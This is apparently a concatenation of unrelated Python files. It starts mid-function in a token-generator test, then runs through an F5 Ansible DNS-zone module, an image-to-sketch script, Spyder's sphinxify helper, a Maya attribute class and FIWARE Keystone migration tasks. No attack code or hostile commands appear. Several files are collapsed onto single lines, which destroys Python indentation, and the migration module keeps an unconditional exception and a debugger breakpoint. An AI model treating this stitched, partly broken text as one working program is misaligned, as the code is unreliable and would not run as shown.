        if random is None or not random:
            t_min = -1 << 63
            t_max = 1 << 63
        for dc_nodes in self.dc_nodes_combinations:
            all_tokens = sortedset()
            node_count = 0
            generated_tokens = self.call_token_generator(self.cluster.get_install_dir(), random, dc_nodes)
            assert len(dc_nodes) == len(generated_tokens)
            for n in range(0, len(dc_nodes)):
                nodes = dc_nodes[n]
                node_count += nodes
                tokens = generated_tokens[n]
                assert nodes == len(tokens)
                for tok in tokens:
                    assert t_min <= tok < t_max, "Generated token %r out of partitioner range %r..%r" % (tok, t_min, t_max - 1)
                    assert tok not in all_tokens, "Duplicate token %r for nodes-counts %r" % (tok, dc_nodes)
                    all_tokens.add(tok)
            assert len(all_tokens) == node_count, "Number of tokens %r and number of nodes %r does not match for %r" % (len(all_tokens), node_count, dc_nodes)

    def test_multi_dc_tokens_default(self):
        self._multi_dc_tokens()

    def test_multi_dc_tokens_murmur3(self):
        self._multi_dc_tokens(False)

    def test_multi_dc_tokens_random(self):
        self._multi_dc_tokens(True)
#!/usr/bin/python # -*- coding: utf-8 -*- # # Copyright: (c) 2018, F5 Networks Inc. # GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'certified'} DOCUMENTATION = r''' --- module: bigip_dns_zone short_description: Manage DNS zones on BIG-IP description: - Manage DNS zones on BIG-IP. The zones managed here are primarily used for configuring DNS Express on BIG-IP. This module does not configure zones that are found in BIG-IP ZoneRunner. version_added: 2.8 options: name: description: - Specifies the name of the DNS zone. - The name must begin with a letter and contain only letters, numbers, and the underscore character. type: str required: True dns_express: description: - DNS express related settings. type: dict suboptions: server: description: - Specifies the back-end authoritative DNS server from which the BIG-IP system receives AXFR zone transfers for the DNS Express zone. type: str enabled: description: - Specifies the current status of the DNS Express zone. type: bool notify_action: description: - Specifies the action the system takes when a NOTIFY message is received for this DNS Express zone. - If a TSIG key is configured for the zone, the signature is only validated for C(consume) and C(repeat) actions. - When C(consume), the NOTIFY message is seen only by DNS Express. - When C(bypass), the NOTIFY message does not go to DNS Express, but instead goes to a back-end DNS server (subject to the value of the Unhandled Query Action configured in the DNS profile applied to the listener that handles the DNS request). - When C(repeat), the NOTIFY message goes to both DNS Express and any back-end DNS server. type: str choices: - consume - bypass - repeat allow_notify_from: description: - Specifies the IP addresses from which the system accepts NOTIFY messages for this DNS Express zone. type: list verify_tsig: description: - Specifies whether the system verifies the identity of the authoritative nameserver that sends updated information for this DNS Express zone. type: bool response_policy: description: - Specifies whether this DNS Express zone is a DNS response policy zone (RPZ). type: bool nameservers: description: - Specifies the DNS nameservers to which the system sends NOTIFY messages. type: list tsig_server_key: description: - Specifies the TSIG key the system uses to authenticate the back-end DNS authoritative server that sends AXFR zone transfers to the BIG-IP system. type: str state: description: - When C(present), ensures that the resource exists. - When C(absent), ensures the resource is removed. type: str choices: - present - absent default: present partition: description: - Device partition to manage resources on. type: str default: Common extends_documentation_fragment: f5 author: - Tim Rupp (@caphrim007) ''' EXAMPLES = r''' - name: Create a DNS zone for DNS express bigip_dns_zone: name: foo.bar.com dns_express: enabled: yes server: dns-lab allow_notify_from: - 192.168.39.10 notify_action: consume verify_tsig: no response_policy: no provider: password: secret server: lb.mydomain.com user: admin delegate_to: localhost ''' RETURN = r''' enabled: description: Whether the zone is enabled or not. returned: changed type: bool sample: yes allow_notify_from: description: The new DNS Express Allow NOTIFY From value. 
returned: changed type: list sample: ['1.1.1.1', '2.2.2.2'] notify_action: description: The new DNS Express Notify Action value. returned: changed type: str sample: consume verify_tsig: description: The new DNS Express Verify Notify TSIG value. returned: changed type: bool sample: yes express_server: description: The new DNS Express Server value. returned: changed type: str sample: server1 response_policy: description: The new DNS Express Response Policy value. returned: changed type: bool sample: no nameservers: description: The new Zone Transfer Clients Nameservers value. returned: changed type: list sample: ['/Common/server1', '/Common/server2'] tsig_server_key: description: The new TSIG Server Key value. returned: changed type: str sample: /Common/key1 ''' from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.basic import env_fallback try: from library.module_utils.network.f5.bigip import F5RestClient from library.module_utils.network.f5.common import F5ModuleError from library.module_utils.network.f5.common import AnsibleF5Parameters from library.module_utils.network.f5.common import fq_name from library.module_utils.network.f5.common import f5_argument_spec from library.module_utils.network.f5.common import transform_name from library.module_utils.network.f5.common import flatten_boolean from library.module_utils.network.f5.compare import cmp_simple_list except ImportError: from ansible.module_utils.network.f5.bigip import F5RestClient from ansible.module_utils.network.f5.common import F5ModuleError from ansible.module_utils.network.f5.common import AnsibleF5Parameters from ansible.module_utils.network.f5.common import fq_name from ansible.module_utils.network.f5.common import f5_argument_spec from ansible.module_utils.network.f5.common import transform_name from ansible.module_utils.network.f5.common import flatten_boolean from ansible.module_utils.network.f5.compare import cmp_simple_list class Parameters(AnsibleF5Parameters): api_map = { 'dnsExpressEnabled': 'enabled', 'dnsExpressAllowNotify': 'allow_notify_from', 'dnsExpressNotifyAction': 'notify_action', 'dnsExpressNotifyTsigVerify': 'verify_tsig', 'dnsExpressServer': 'express_server', 'responsePolicy': 'response_policy', 'transferClients': 'nameservers', 'serverTsigKey': 'tsig_server_key', } api_attributes = [ 'dnsExpressEnabled', 'dnsExpressAllowNotify', 'dnsExpressNotifyAction', 'dnsExpressNotifyTsigVerify', 'dnsExpressServer', 'responsePolicy', 'transferClients', 'serverTsigKey', ] returnables = [ 'enabled', 'allow_notify_from', 'notify_action', 'verify_tsig', 'express_server', 'response_policy', 'nameservers', 'tsig_server_key', ] updatables = [ 'enabled', 'allow_notify_from', 'notify_action', 'verify_tsig', 'express_server', 'response_policy', 'nameservers', 'tsig_server_key', ] class ApiParameters(Parameters): pass class ModuleParameters(Parameters): @property def express_server(self): try: if self._values['dns_express']['server'] is None: return None if self._values['dns_express']['server'] in ['', 'none']: return '' return fq_name(self.partition, self._values['dns_express']['server']) except (TypeError, KeyError): return None @property def nameservers(self): if self._values['nameservers'] is None: return None elif len(self._values['nameservers']) == 1 and self._values['nameservers'][0] in ['', 'none']: return '' return [fq_name(self.partition, x) for x in self._values['nameservers']] @property def tsig_server_key(self): if self._values['tsig_server_key'] is None: return None if 
self._values['tsig_server_key'] in ['', 'none']: return '' return fq_name(self.partition, self._values['tsig_server_key']) @property def enabled(self): try: return flatten_boolean(self._values['dns_express']['enabled']) except (TypeError, KeyError): return None @property def verify_tsig(self): try: return flatten_boolean(self._values['dns_express']['verify_tsig']) except (TypeError, KeyError): return None @property def notify_action(self): try: return self._values['dns_express']['notify_action'] except (TypeError, KeyError): return None @property def response_policy(self): try: return flatten_boolean(self._values['dns_express']['response_policy']) except (TypeError, KeyError): return None @property def allow_notify_from(self): try: v = self._values['dns_express']['allow_notify_from'] if v is None: return None elif len(v) == 1 and v[0] in ['', 'none']: return '' return v except (TypeError, KeyError): return None class Changes(Parameters): def to_return(self): result = {} try: for returnable in self.returnables: result[returnable] = getattr(self, returnable) result = self._filter_params(result) except Exception: pass return result class UsableChanges(Changes): pass class ReportableChanges(Changes): pass class Difference(object): def __init__(self, want, have=None): self.want = want self.have = have def compare(self, param): try: result = getattr(self, param) return result except AttributeError: return self.__default(param) @property def allow_notify_from(self): return cmp_simple_list(self.want.allow_notify_from, self.have.allow_notify_from) @property def nameservers(self): return cmp_simple_list(self.want.nameservers, self.have.nameservers) @property def express_server(self): if self.want.express_server is None: return None if self.want.express_server == '' and self.have.express_server is None: return None if self.want.express_server != self.have.express_server: return self.want.express_server @property def tsig_server_key(self): if self.want.tsig_server_key is None: return None if self.want.tsig_server_key == '' and self.have.tsig_server_key is None: return None if self.want.tsig_server_key != self.have.tsig_server_key: return self.want.tsig_server_key def __default(self, param): attr1 = getattr(self.want, param) try: attr2 = getattr(self.have, param) if attr1 != attr2: return attr1 except AttributeError: return attr1 class ModuleManager(object): def __init__(self, *args, **kwargs): self.module = kwargs.get('module', None) self.client = F5RestClient(**self.module.params) self.want = ModuleParameters(params=self.module.params) self.have = ApiParameters() self.changes = UsableChanges() def _set_changed_options(self): changed = {} for key in Parameters.returnables: if getattr(self.want, key) is not None: changed[key] = getattr(self.want, key) if changed: self.changes = UsableChanges(params=changed) def _update_changed_options(self): diff = Difference(self.want, self.have) updatables = Parameters.updatables changed = dict() for k in updatables: change = diff.compare(k) if change is None: continue else: if isinstance(change, dict): changed.update(change) else: changed[k] = change if changed: self.changes = UsableChanges(params=changed) return True return False def should_update(self): result = self._update_changed_options() if result: return True return False def exec_module(self): changed = False result = dict() state = self.want.state if state == "present": changed = self.present() elif state == "absent": changed = self.absent() reportable = ReportableChanges(params=self.changes.to_return()) 
changes = reportable.to_return() result.update(**changes) result.update(dict(changed=changed)) self._announce_deprecations(result) return result def _announce_deprecations(self, result): warnings = result.pop('__warnings', []) for warning in warnings: self.client.module.deprecate( msg=warning['msg'], version=warning['version'] ) def present(self): if self.exists(): return self.update() else: return self.create() def exists(self): uri = "https://{0}:{1}/mgmt/tm/ltm/dns/zone/{2}".format( self.client.provider['server'], self.client.provider['server_port'], transform_name(self.want.partition, self.want.name) ) resp = self.client.api.get(uri) try: response = resp.json() except ValueError: return False if resp.status == 404 or 'code' in response and response['code'] == 404: return False return True def update(self): self.have = self.read_current_from_device() if not self.should_update(): return False if self.module.check_mode: return True self.update_on_device() return True def remove(self): if self.module.check_mode: return True self.remove_from_device() if self.exists(): raise F5ModuleError("Failed to delete the resource.") return True def create(self): self._set_changed_options() if self.module.check_mode: return True self.create_on_device() return True def create_on_device(self): params = self.changes.api_params() params['name'] = self.want.name params['partition'] = self.want.partition uri = "https://{0}:{1}/mgmt/tm/ltm/dns/zone/".format( self.client.provider['server'], self.client.provider['server_port'] ) resp = self.client.api.post(uri, json=params) try: response = resp.json() except ValueError as ex: raise F5ModuleError(str(ex)) if 'code' in response and response['code'] in [400, 403]: if 'message' in response: raise F5ModuleError(response['message']) else: raise F5ModuleError(resp.content) def update_on_device(self): params = self.changes.api_params() uri = "https://{0}:{1}/mgmt/tm/ltm/dns/zone/{2}".format( self.client.provider['server'], self.client.provider['server_port'], transform_name(self.want.partition, self.want.name) ) resp = self.client.api.patch(uri, json=params) try: response = resp.json() except ValueError as ex: raise F5ModuleError(str(ex)) if 'code' in response and response['code'] == 400: if 'message' in response: raise F5ModuleError(response['message']) else: raise F5ModuleError(resp.content) def absent(self): if self.exists(): return self.remove() return False def remove_from_device(self): uri = "https://{0}:{1}/mgmt/tm/ltm/dns/zone/{2}".format( self.client.provider['server'], self.client.provider['server_port'], transform_name(self.want.partition, self.want.name) ) response = self.client.api.delete(uri) if response.status == 200: return True raise F5ModuleError(response.content) def read_current_from_device(self): uri = "https://{0}:{1}/mgmt/tm/ltm/dns/zone/{2}".format( self.client.provider['server'], self.client.provider['server_port'], transform_name(self.want.partition, self.want.name) ) resp = self.client.api.get(uri) try: response = resp.json() except ValueError as ex: raise F5ModuleError(str(ex)) if 'code' in response and response['code'] == 400: if 'message' in response: raise F5ModuleError(response['message']) else: raise F5ModuleError(resp.content) return ApiParameters(params=response) class ArgumentSpec(object): def __init__(self): self.supports_check_mode = True argument_spec = dict( name=dict(required=True), dns_express=dict( type='dict', options=dict( server=dict(), enabled=dict(type='bool'), notify_action=dict( choices=['consume', 'bypass', 'repeat'] ), 
allow_notify_from=dict(type='list'), verify_tsig=dict(type='bool'), response_policy=dict(type='bool') ) ), nameservers=dict(type='list'), tsig_server_key=dict(), partition=dict( default='Common', fallback=(env_fallback, ['F5_PARTITION']) ), state=dict( default='present', choices=['present', 'absent'] ) ) self.argument_spec = {} self.argument_spec.update(f5_argument_spec) self.argument_spec.update(argument_spec) def main(): spec = ArgumentSpec() module = AnsibleModule( argument_spec=spec.argument_spec, supports_check_mode=spec.supports_check_mode, ) try: mm = ModuleManager(module=module) results = mm.exec_module() module.exit_json(**results) except F5ModuleError as ex: module.fail_json(msg=str(ex)) if __name__ == '__main__': main()
import cv2
import os
import time
import numpy as np
from util.helper import *
from keras.models import load_model

mod = load_model('data/mod.h5')


def img_to_sketch_with_hed(raw_path, new_img_size, new_path):
    img = cv2.imread(raw_path)
    img = img.transpose((2, 0, 1))
    light_map = np.zeros(img.shape, dtype=np.float)
    for channel in range(3):
        light_map[channel] = get_light_map_single(img[channel])
    # light_map = normalize_pic(light_map)
    light_map = light_map[None]
    light_map = light_map.transpose((1, 2, 3, 0))
    line_mat = mod.predict(light_map, batch_size=1)
    line_mat = line_mat.transpose((3, 1, 2, 0))[0]
    line_mat = np.amax(line_mat, 2)
    adjust_and_save_img(line_mat, new_img_size, path=new_path)
    return


def img_to_sketch_with_hed_with_loop(data_path):
    img_list = os.listdir(data_path)
    img_count = 0
    time_start = time.time()
    for img_file in img_list[:100]:
        file_path = '{}/{}'.format(data_path, img_file)
        try:
            img = cv2.imread(file_path)
            # resize img
            img = cv2.resize(img, (512, 512), interpolation=cv2.INTER_AREA)
        except:
            print('problematic file:', file_path)
            continue
        if img is None:
            print('problematic file:', file_path)
            continue
        else:
            img = img.transpose((2, 0, 1))
            light_map = np.zeros(img.shape, dtype=np.float)
            for channel in range(3):
                light_map[channel] = get_light_map_single(img[channel])
            light_map = normalize_pic(light_map)
            light_map = light_map[None]
            light_map = light_map.transpose((1, 2, 3, 0))
            line_mat = mod.predict(light_map, batch_size=1)
            line_mat = line_mat.transpose((3, 1, 2, 0))[0]
            line_mat = np.amax(line_mat, 2)
            old_file_location = 'full'
            new_file_location = 'hed'
            new_path = file_path.replace(old_file_location, new_file_location)
            print('newpath', new_path)
            adjust_and_save_img(line_mat, 512, path=new_path)
            img_count += 1
            if img_count % 1000 == 0:
                time_end = time.time()
                print('{} images processed! time cost {}'.format(img_count, time_end - time_start))
                time_start = time_end
    print('finished processing {} images !'.format(img_count))
    return


def high_pass_filter(img):
    img_gray = cv2.cvtColor(img.astype(np.uint8), cv2.COLOR_BGR2GRAY)
    kernel_size = 3
    img_blurred = cv2.GaussianBlur(img_gray, (kernel_size, kernel_size), 0)
    max_intensity_value = 255
    img_stroke = (img_gray.astype(int) - img_blurred.astype(int)) * 2 + max_intensity_value
    return img_stroke


def canny_edge_detector(img, img_to_blur, img_to_grayscale, blur_size, lower_threshold, upper_threshold):
    if img_to_blur:
        img = cv2.GaussianBlur(img, (blur_size, blur_size), 0)
    if img_to_grayscale:
        img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    sketch = cv2.Canny(img, lower_threshold, upper_threshold)
    sketch = cv2.bitwise_not(sketch)
    return sketch


def loop_canny_edge_detector(data_path):
    img_list = os.listdir(data_path)
    img_count = 0
    for img_file in img_list:
        file_path = '{}/{}'.format(data_path, img_file)
        try:
            img = cv2.imread(file_path)
        except:
            print('problematic file:', file_path)
            continue
        if img is None:
            print('problematic file:', file_path)
            continue
        else:
            sketch = canny_edge_detector(img, 1, 1, 3, 50, 250)
            cv2.imwrite(file_path, sketch)
            img_count += 1
            if img_count % 100 == 0:
                print('{} images processed!'.format(img_count), end='\r')
    print('finished processing {} images !'.format(img_count))
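
# A small, hedged usage sketch for the edge/stroke helpers above. The paths
# 'data/sample.png', 'data/sample_canny.png' and 'data/sample_stroke.png' are
# placeholders; np.clip brings the high-pass result back into the displayable
# 0-255 range before saving. Running the module still requires the HED model
# file loaded at import time.
if __name__ == '__main__':
    demo_img = cv2.imread('data/sample.png')
    if demo_img is None:
        print('demo image not found; adjust the path to try this sketch')
    else:
        # inverted Canny edges, same parameters as loop_canny_edge_detector
        canny_sketch = canny_edge_detector(demo_img, 1, 1, 3, 50, 250)
        cv2.imwrite('data/sample_canny.png', canny_sketch)

        # pencil-like stroke from the high-pass filter, clipped to uint8
        stroke = high_pass_filter(demo_img)
        stroke = np.clip(stroke, 0, 255).astype(np.uint8)
        cv2.imwrite('data/sample_stroke.png', stroke)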
# -*- coding: utf-8 -* """ Process docstrings with Sphinx AUTHORS: - Tim Joseph Dumol (2009-09-29): initial version - The Spyder Development Team: Several changes to make it work with Spyder Copyright (C) 2009 Tim Dumol <[email protected]> Copyright (C) 2013 The Spyder Development Team Distributed under the terms of the BSD License Taken from the Sage project (www.sagemath.org). See here for the original version: www.sagemath.org/doc/reference/sagenb/misc/sphinxify.html """ # Stdlib imports import codecs import os import os.path as osp import shutil import sys from tempfile import mkdtemp # 3rd party imports from docutils.utils import SystemMessage as SystemMessage from jinja2 import Environment, FileSystemLoader import sphinx from sphinx.application import Sphinx # Local imports from spyderlib.baseconfig import (_, get_module_data_path, get_module_source_path) from spyderlib.utils import encoding #----------------------------------------------------------------------------- # Globals and constants #----------------------------------------------------------------------------- # Note: we do not use __file__ because it won't be working in the stand-alone # version of Spyder (i.e. the py2exe or cx_Freeze build) CONFDIR_PATH = get_module_source_path('spyderlib.utils.inspector') CSS_PATH = osp.join(CONFDIR_PATH, 'static', 'css') JS_PATH = osp.join(CONFDIR_PATH, 'js') # To let Debian packagers redefine the MathJax and JQuery locations so they can # use their own packages for them. See Issue 1230, comment #7. MATHJAX_PATH = get_module_data_path('spyderlib', relpath=osp.join('utils', 'inspector', JS_PATH, 'mathjax'), attr_name='MATHJAXPATH') JQUERY_PATH = get_module_data_path('spyderlib', relpath=osp.join('utils', 'inspector', JS_PATH), attr_name='JQUERYPATH') #----------------------------------------------------------------------------- # Utility functions #----------------------------------------------------------------------------- def is_sphinx_markup(docstring): """Returns whether a string contains Sphinx-style ReST markup.""" # this could be made much more clever return ("`" in docstring or "::" in docstring) def warning(message): """Print a warning message on the rich text view""" env = Environment() env.loader = FileSystemLoader(osp.join(CONFDIR_PATH, 'templates')) warning = env.get_template("warning.html") return warning.render(css_path=CSS_PATH, text=message) def usage(title, message, tutorial_message, tutorial): """Print a usage message on the rich text view""" env = Environment() env.loader = FileSystemLoader(osp.join(CONFDIR_PATH, 'templates')) usage = env.get_template("usage.html") return usage.render(css_path=CSS_PATH, title=title, intro_message=message, tutorial_message=tutorial_message, tutorial=tutorial) def generate_context(name='', argspec='', note='', math=False, collapse=False, img_path=''): """ Generate the html_context dictionary for our Sphinx conf file. This is a set of variables to be passed to the Jinja template engine and that are used to control how the webpage is rendered in connection with Sphinx Parameters ---------- name : str Object's name. note : str A note describing what type has the function or method being introspected argspec : str Argspec of the the function or method being introspected math : bool Turn on/off Latex rendering on the OI. If False, Latex will be shown in plain text. 
collapse : bool Collapse sections Returns ------- A dict of strings to be used by Jinja to generate the webpage """ context = \ { # Arg dependent variables 'math_on': 'true' if math else '', 'name': name, 'argspec': argspec, 'note': note, 'collapse': collapse, 'img_path': img_path, # Static variables 'css_path': CSS_PATH, 'js_path': JS_PATH, 'jquery_path': JQUERY_PATH, 'mathjax_path': MATHJAX_PATH, 'right_sphinx_version': '' if sphinx.__version__ < "1.1" else 'true', 'platform': sys.platform } return context def sphinxify(docstring, context, buildername='html'): """ Runs Sphinx on a docstring and outputs the processed documentation. Parameters ---------- docstring : str a ReST-formatted docstring context : dict Variables to be passed to the layout template to control how its rendered (through the Sphinx variable *html_context*). buildername: str It can be either `html` or `text`. Returns ------- An Sphinx-processed string, in either HTML or plain text format, depending on the value of `buildername` """ srcdir = mkdtemp() srcdir = encoding.to_unicode_from_fs(srcdir) base_name = osp.join(srcdir, 'docstring') rst_name = base_name + '.rst' if buildername == 'html': suffix = '.html' else: suffix = '.txt' output_name = base_name + suffix # This is needed so users can type \\ on latex eqnarray envs inside raw # docstrings if context['right_sphinx_version'] and context['math_on']: docstring = docstring.replace('\\\\', '\\\\\\\\') # Add a class to several characters on the argspec. This way we can # highlight them using css, in a similar way to what IPython does. argspec = context['argspec'] for char in ['=', ',', '(', ')', '*', '**']: argspec = argspec.replace(char, '<span class="argspec-highlight">' + char + '</span>') context['argspec'] = argspec doc_file = codecs.open(rst_name, 'w', encoding='utf-8') doc_file.write(docstring) doc_file.close() temp_confdir = False if temp_confdir: # TODO: This may be inefficient. Find a faster way to do it. confdir = mkdtemp() confdir = encoding.to_unicode_from_fs(confdir) generate_configuration(confdir) else: confdir = osp.join(get_module_source_path('spyderlib.utils.inspector')) confoverrides = {'html_context': context} doctreedir = osp.join(srcdir, 'doctrees') sphinx_app = Sphinx(srcdir, confdir, srcdir, doctreedir, buildername, confoverrides, status=None, warning=None, freshenv=True, warningiserror=False, tags=None) try: sphinx_app.build(None, [rst_name]) except SystemMessage: output = _("It was not possible to generate rich text help for this " "object.</br>" "Please see it in plain text.") return warning(output) # TODO: Investigate if this is necessary/important for us if osp.exists(output_name): output = codecs.open(output_name, 'r', encoding='utf-8').read() output = output.replace('<pre>', '<pre class="literal-block">') else: output = _("It was not possible to generate rich text help for this " "object.</br>" "Please see it in plain text.") return warning(output) if temp_confdir: shutil.rmtree(confdir, ignore_errors=True) shutil.rmtree(srcdir, ignore_errors=True) return output def generate_configuration(directory): """ Generates a Sphinx configuration in `directory`. 
Parameters ---------- directory : str Base directory to use """ # conf.py file for Sphinx conf = osp.join(get_module_source_path('spyderlib.utils.inspector'), 'conf.py') # Docstring layout page (in Jinja): layout = osp.join(osp.join(CONFDIR_PATH, 'templates'), 'layout.html') os.makedirs(osp.join(directory, 'templates')) os.makedirs(osp.join(directory, 'static')) shutil.copy(conf, directory) shutil.copy(layout, osp.join(directory, 'templates')) open(osp.join(directory, '__init__.py'), 'w').write('') open(osp.join(directory, 'static', 'empty'), 'w').write('')
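
# A hedged smoke test for the two public helpers above, not part of Spyder
# itself. The docstring text is arbitrary, and the 'text' builder is used so
# the result can be printed without a browser; it assumes a working Sphinx
# installation and the bundled conf directory.
if __name__ == '__main__':
    demo_docstring = """Return the sum of ``a`` and ``b``.

    :param a: first operand
    :param b: second operand
    """
    demo_context = generate_context(name='add', argspec='(a, b)',
                                    note='Demo function', math=False)
    print(sphinxify(demo_docstring, demo_context, buildername='text'))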
# NumericNodeAttribute.py
# (C)2014
# Scott Ernst

from __future__ import print_function, absolute_import, unicode_literals, division

from elixir.nodes.attrs.NodeAttribute import NodeAttribute

try:
    # noinspection PyUnresolvedReferences,PyUnresolvedReferences
    from maya import OpenMaya
except Exception:
    # guard the name actually imported above, so a missing Maya install fails
    # on OpenMaya rather than leaving the name undefined
    OpenMaya = None

#___________________________________________________________________________________________________ NumericNodeAttribute
class NumericNodeAttribute(NodeAttribute):
    """A class for..."""

#===================================================================================================
#                                                                                       C L A S S

#___________________________________________________________________________________________________ __init__
    def __init__(
            self, shortFlag, longFlag, defaultValue =0,
            numericType =OpenMaya.MFnNumericData.kFloat, **kwargs
    ):
        """Creates a new instance of NumericNodeAttribute."""
        NodeAttribute.__init__(self, shortFlag, longFlag, **kwargs)
        self._defaultValue = defaultValue
        self._numericType = numericType

#===================================================================================================
#                                                                               P R O T E C T E D

#___________________________________________________________________________________________________ _createAttributeFn
    def _createAttributeFn(self):
        return OpenMaya.MFnNumericAttribute()

#___________________________________________________________________________________________________ _createAttribute
    def _createAttribute(self, attrFn):
        return attrFn.create(
            self._longFlag, self._shortFlag, self._numericType, self._defaultValue)
# Copyright (C) 2014 Universidad Politecnica de Madrid # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """This module holds task used to migrate from old releases. Regular users shouldn't need any of this tasks. """ import datetime import json import os import uuid from deployment.keystone import PopulateTask, _admin_token_connection from conf import settings from keystoneclient import exceptions # This dictinary holds the old ids for permissions and roles. Only used # for migration purposes. MIGRATION_OLD_IDS = { 'Manage the application': '5', 'Manage roles': '6', 'Get and assign all public application roles': '7', 'Manage Authorizations': '8', 'provider': '285', 'purchaser': '6453fc41aa9d404b984d9da0566a1f7e', } CLOUD_APP_ID = 'f8999e1ee0884195997b63280c2b0264' CLOUD_ROLE_ID = 'd38d9cd4fa524b87a87feb45904480f7' NO_FILTER_ENDPOINT_GROUP_ID = '628912b79e5540b8a08d33e5eb60c233' class MigratePopulateTask(PopulateTask): """Populates the database with migration specifics from the old idm.""" name = "populate" def run(self, keystone_path=settings.KEYSTONE_ROOT): keystone = _admin_token_connection() # migration old ids not configured raise Exception() # Keystone services self._create_services_and_endpoints(keystone) # Enpoint groups self._create_endpoint_group_filters(keystone) keystone_roles = self._create_keystone_roles(keystone) idm_user = self._create_idm_user_and_project(keystone, keystone_roles) # user our migration method here to asign ids to roles and permissions idm_app = self._create_internal_roles_and_permissions(keystone) # Make the idm user administrator self._grant_administrator(keystone, idm_app, [idm_user]) def _create_internal_roles_and_permissions(self, keystone): # Default internal application idm_app = keystone.oauth2.consumers.create( settings.IDM_USER_CREDENTIALS['username'], description='', grant_type='authorization_code', client_type='confidential', is_default=True) # Default Permissions and roles created_permissions = [] for permission in settings.INTERNAL_PERMISSIONS: old_id = MIGRATION_OLD_IDS.get(permission, uuid.uuid4().hex) created_permissions.append( keystone.fiware_roles.permissions.create( id=old_id, name=permission, application=idm_app, is_internal=True)) created_roles = [] for role in settings.INTERNAL_ROLES: old_id = MIGRATION_OLD_IDS.get(role, uuid.uuid4().hex) created_role = keystone.fiware_roles.roles.create( id=old_id, name=role, application=idm_app, is_internal=True) created_roles.append(created_role) # Link roles with permissions for index in settings.INTERNAL_ROLES[role]: keystone.fiware_roles.permissions.add_to_role( created_role, created_permissions[index]) print ('Created default fiware roles and permissions.') return idm_app instance = MigratePopulateTask() class MigrateCategoriesTask(PopulateTask): """Assignates a category to the old users.""" name = "user_categories" def run(self, keystone_path=settings.KEYSTONE_ROOT): __location__ = os.path.realpath( os.path.join(os.getcwd(), os.path.dirname(__file__))) categories = json.load(open(os.path.join(__location__, 
'categories.json'))) keystone = _admin_token_connection() self.trial_role = keystone.roles.find(name='trial') self.community_role = keystone.roles.find(name='community') self.basic_role = keystone.roles.find(name='basic') for data in categories: user_id = data['user_id'] role_id = data['role_id'] region_id = data.get('region_id', None) if (role_id == self.trial_role.id and not region_id): region_id = 'Spain2' if role_id == self.community_role.id and not region_id: print ('ERROR: {0} community with no region'.format(user_id)) continue if role_id == self.basic_role.id and region_id: region_id = None print ('WARNING: {0} basic with region, ignoring it'.format(user_id)) if role_id not in [self.trial_role.id, self.basic_role.id, self.community_role.id]: print ('ERROR: {0} invalid role_id {1}'.format(user_id, role_id)) continue self.update_account(keystone, user_id, role_id, region_id) def update_account(self, keystone, user_id, role_id, region_id=None): user = keystone.users.get(user_id) # grant the selected role keystone.roles.grant(user=user_id, role=role_id, domain='default') date = str(datetime.date.today()) if role_id == self.trial_role.id: keystone.users.update(user=user, trial_started_at=date) elif role_id == self.community_role.id: keystone.users.update(user=user, community_started_at=date) # cloud if role_id != self.basic_role.id: self._activate_cloud(keystone, user_id, user.cloud_project_id) # assign endpoint group for the selected region if not region_id: return endpoint_groups = keystone.endpoint_groups.list() region_group = next(group for group in endpoint_groups if group.filters.get('region_id', None) == region_id) if not region_group: print ('There is no endpoint group defined for {0}'.format(region_id)) keystone.endpoint_groups.add_endpoint_group_to_project( project=user.cloud_project_id, endpoint_group=region_group) # done! print ('OK: {0}'.format(user_id)) def _activate_cloud(self, keystone, user_id, cloud_project_id): # grant purchaser in cloud app to cloud org # and Member to the user keystone.fiware_roles.roles.add_to_organization( role=MIGRATION_OLD_IDS['purchaser'], organization=cloud_project_id, application=CLOUD_APP_ID) keystone.fiware_roles.roles.add_to_user( role=CLOUD_ROLE_ID, user=user_id, organization=cloud_project_id, application=CLOUD_APP_ID) instance2 = MigrateCategoriesTask() class AllRegionsForAllUsersTask(PopulateTask): """Assignates the no-filter endpoint group to all users""" name = "all_regions_to_all_users" def run(self, keystone_path=settings.KEYSTONE_ROOT): keystone = _admin_token_connection() all_users = keystone.users.list() for user in all_users: if not hasattr(user, 'cloud_project_id'): print 'Skip {0}, no cloud project id'.format(user.name) continue try: keystone.endpoint_groups.add_endpoint_group_to_project( project=user.cloud_project_id, endpoint_group=NO_FILTER_ENDPOINT_GROUP_ID) print '200 OK {0}'.format(user.name) except exceptions.Conflict: print '409 User {0} already has it'.format(user.name) except exceptions.NotFound: print '404 Not found project {0} for user {1}'.format( user.cloud_project_id, user.name) print 'Done.' 
instance3 = AllRegionsForAllUsersTask() class AssignDefaultProjectTask(PopulateTask): """Assigns a default project to a list of users defined in a file.""" name = "default_project_to_admins" def run(self, keystone_path=settings.KEYSTONE_ROOT): __location__ = os.path.realpath( os.path.join(os.getcwd(), os.path.dirname(__file__))) admins = json.load(open(os.path.join(__location__, 'keystone_admins.json'))) keystone = _admin_token_connection() admin_project = keystone.projects.find(name='admin') import pdb; pdb.set_trace() for user_name in admins: user = keystone.users.find(name=user_name) res = keystone.users.update(user, default_project=admin_project) print user_name, res print 'Done.' instance4 = AssignDefaultProjectTask() class SetNameAsUsernameTask(PopulateTask): """Sets username to name to a list of users defined in a file.""" name = "set_username" def run(self, users_file): __location__ = os.path.realpath( os.path.join(os.getcwd(), os.path.dirname(__file__))) admins = json.load(open(os.path.join(__location__, users_file))) keystone = _admin_token_connection() for user_name in admins: user = keystone.users.find(name=user_name) res = keystone.users.update(user, username=user_name) print user_name, res print 'Done.' instance5 = SetNameAsUsernameTask()
